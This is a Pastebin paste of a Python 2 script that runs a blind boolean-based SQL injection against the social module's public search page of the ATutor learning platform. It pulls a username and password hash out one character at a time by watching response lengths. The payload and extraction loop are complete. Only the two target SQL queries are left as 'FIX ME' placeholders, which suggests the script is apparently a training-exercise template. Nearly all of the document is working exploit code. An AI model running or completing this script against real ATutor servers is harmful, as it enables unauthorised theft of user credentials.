SHARE
TWEET

Untitled

a guest Jan 28th, 2020 141 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import requests
  2. import sys
  3. def searchFriends_sqli(ip, inj_str):
  4. for j in range(32, 126):
  5. # now we update the sqli
  6. target = "http://%s/ATutor/mods/_standard/social/index_public.php?q=%s" %
  7. (ip, inj_str.replace("[CHAR]", str(j)))
  8. r = requests.get(target)
  9. #print r.headers
  10. content_length = int(r.headers['Content-Length'])
  11. if (content_length > 20):
  12. return j
  13. return None
  14. def inject(r, inj, ip):
  15. extracted = ""
  16. for i in range(1, r):
  17. injection_string =
  18. "test'/**/or/**/(ascii(substring((%s),%d,1)))=[CHAR]/**/or/**/1='" % (inj,i)
  19. retrieved_value = searchFriends_sqli(ip, injection_string)
  20. if(retrieved_value):
  21. extracted += chr(retrieved_value)
  22. extracted_char = chr(retrieved_value)
  23. sys.stdout.write(extracted_char)
  24. sys.stdout.flush()
  25. else:
  26. print "\n(+) done!"
  27. break
  28. return extracted
  29. def main():
  30. if len(sys.argv) != 2:
  31. print "(+) usage: %s <target>" % sys.argv[0]
  32. print '(+) eg: %s 192.168.121.103' % sys.argv[0]
  33. sys.exit(-1)
  34. ip = sys.argv[1]
  35. print "(+) Retrieving username...."
  36. query = ---------------------FIX ME---------------------
  37. username = inject(50, query, ip)
  38. print "(+) Retrieving password hash...."
  39. query = ---------------------FIX ME---------------------
  40. password = inject(50, query, ip)
  41. print "(+) Credentials: %s / %s" % (username, password)
  42. if __name__ == "__main__":
  43. main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top